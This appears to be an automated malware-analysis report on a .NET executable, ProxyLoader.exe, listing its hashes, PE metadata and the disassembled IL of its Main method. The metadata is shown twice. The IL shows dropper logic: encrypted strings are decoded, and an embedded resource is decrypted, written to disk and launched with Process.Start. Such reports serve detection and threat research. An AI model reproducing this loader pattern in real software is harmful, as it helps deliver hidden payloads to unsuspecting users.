780797d9ab0c3bceb7d50a30fc3de50e
PE Executable | MD5: 780797d9ab0c3bceb7d50a30fc3de50e | Size: 1.77 MB | application/x-dosexec
| Hash | Hash Value |
|---|---|
| MD5 | 780797d9ab0c3bceb7d50a30fc3de50e |
| Sha1 | ca6d3865d17265d94ff4af4f7851650244ae34bc |
| Sha256 | 4a5598e056a1f35b8638a606f9870ad2f05f00bd38076e5cf66fc99cb6309b19 |
| Sha384 | 315306af686efa30f17710bb4714d81fef741f2dd103cdbda70f51d0e734826194645ffbe6362e453f71da6a451a53f1 |
| Sha512 | bfa241ba7c76aaddd795c46dc6076e452b740e081dea99d1506940e3867f4cbfe6f37e7487773076631c2abc0ecda7be275573de54afa3c6db18232a66d25b00 |
| SSDeep | 49152:jLomO28nxkWIAbETHa1hGVr3L/9+WORpbsBLn5FRWTe/Iel:GlnxHHbETHa123L1+/sBzRWL |
| TLSH | 6585332465C83D86E8213B3544B33283953F89B66A3C6A5ED86F85862CF5487F345B3F |

PeID
| Name0 | Value |
|---|---|
| Module Name | ProxyLoader.exe |
| Full Name | ProxyLoader.exe |
| EntryPoint | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Scope Name | ProxyLoader.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | ProxyLoader |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 17 |
| Main Method | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Main IL Instruction Count | 121 |
| Main IL | ldstr Fbpro4QbsCX1qPzlvmhvV0tuDNXOD6kdhDotQ9SAdBtJeb82Ffn0hQPFNDIvaM+OP4aW5cLfwlJYn1vjMavxTHkGOwhwX4L5WjeL+dBixYbSLTay6+2kgo+uPSexvOTXoiwz6GhPv52QUG0WQLnN/rqkzoAzpXKXyusL0ngaSphiMPYgDxW68gOZUnb/2l+0QxCV/WXEzHPwxsCilOzHTl375huSejJpMbgjRlW7SACQrg3TpPaGfrPxSjTi54SOr5p8SA/O9fYFVRH3Y4dGCf5GJb3VjIuDLKzu2/vn6ONho5Jr9uaMb2kbOmYp8zbXjnGtiKn202F8BdOsEx/MWnWz7hXlrR5w7nQ2kJHqj9CEqgLnmBF8FOhjAIQuvagEdi1fySOqYzwTQrN2dmT9lwmNA7sZl2JLiIaVpnGduvrJsC8EiTXnYVjC3GxdlSjIr6atZYt3WrW/eaKRgl37MnU99qJkMuYES8WBxmDxRU6DEeGb+w/zc1VSiOu6LZoMIKwEVhJkIU5g2Ulm9WZQd9kZlG+jSmse/sOBjNwhUZ4= call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldstr Fbpro4QbsCX1qPzlvmhvVwYDDJY1aQaYZc0tcWVbbQcQGEPaJHfu2FDPjtWmOLmSuXZQGxzIuxjSZYVPxZMG+4avuiEM7qLNzZFB29AeqbQaSfC+ZT4czrQwBRwRFEQ9vnAKLTCp6lncaHrQZ40vx+1bTsib8EHcDKzV8Z/Aj+r7l3r94gTVlF3m6rHvbMkWmiNcnJjjkarDcS0gFW486ObtqW/SHRXKSLaSly+csog8SPYgus345pp4QIFS7A0efYruR0OcwWmwR67jdJiteb93AMs28PAz4Z6DG4ug/UmGGPxLpvxgctPEQR9zZxul6hGwLogDnTDKGeJCVn4IuFyfqk0xK60bj+nLIn0QoiU7Ea2lxJN1wkdpaaaUmnd45U7trq+HBatw0JNlB6VJFA== call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr OAh1TqGPrxdw9dGEgUgHgA== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr nQMIlOQWEV15Z5j7lVNosA== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr fajfsnlatncgjxjd stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> 
ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr YdlCyJJwoADl8LRPTuaU9A== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr 1FNZRlhs7uaGuwIVkkMLaaMs327CXxK45/rYRk1ugV8= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr umleejfzxbrsfzrr stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr cabbghccteuephas call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0119: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr OIjmZTO0oBZqDu8tFMta0haiTFUwFvk37E4qyyxfi+Y= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00C3: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00C8: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] 
avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::rbycwmaqpflldausljeskikcyyep(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) ldstr DoIcVP/7iyeoKQMwXIoiuA== call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0115: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_00A1: ldloc.0 ret <null> |
| Module Name | ProxyLoader.exe |
| Full Name | ProxyLoader.exe |
| EntryPoint | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Scope Name | ProxyLoader.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | ProxyLoader |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 17 |
| Main Method | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Main IL Instruction Count | 121 |
| Main IL | ldstr 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 call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldstr Fbpro4QbsCX1qPzlvmhvVwYDDJY1aQaYZc0tcWVbbQcQGEPaJHfu2FDPjtWmOLmSuXZQGxzIuxjSZYVPxZMG+4avuiEM7qLNzZFB29AeqbQaSfC+ZT4czrQwBRwRFEQ9vnAKLTCp6lncaHrQZ40vx+1bTsib8EHcDKzV8Z/Aj+r7l3r94gTVlF3m6rHvbMkWmiNcnJjjkarDcS0gFW486ObtqW/SHRXKSLaSly+csog8SPYgus345pp4QIFS7A0efYruR0OcwWmwR67jdJiteb93AMs28PAz4Z6DG4ug/UmGGPxLpvxgctPEQR9zZxul6hGwLogDnTDKGeJCVn4IuFyfqk0xK60bj+nLIn0QoiU7Ea2lxJN1wkdpaaaUmnd45U7trq+HBatw0JNlB6VJFA== call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr OAh1TqGPrxdw9dGEgUgHgA== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr nQMIlOQWEV15Z5j7lVNosA== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr fajfsnlatncgjxjd stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr YdlCyJJwoADl8LRPTuaU9A== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr 1FNZRlhs7uaGuwIVkkMLaaMs327CXxK45/rYRk1ugV8= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr umleejfzxbrsfzrr stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr cabbghccteuephas call 
System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0119: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr OIjmZTO0oBZqDu8tFMta0haiTFUwFvk37E4qyyxfi+Y= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00C3: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00C8: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::rbycwmaqpflldausljeskikcyyep(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) ldstr DoIcVP/7iyeoKQMwXIoiuA== call System.String 
avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0115: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_00A1: ldloc.0 ret <null> |

| Name0 | Value |
|---|---|
| Embedded Resources | 1 |
| Suspicious Type Names (1-2 chars) | 0 |

| Name0 | Value | Location |
|---|---|---|
| Embedded Resources | 1 | 780797d9ab0c3bceb7d50a30fc3de50e |
| Suspicious Type Names (1-2 chars) | 0 | 780797d9ab0c3bceb7d50a30fc3de50e |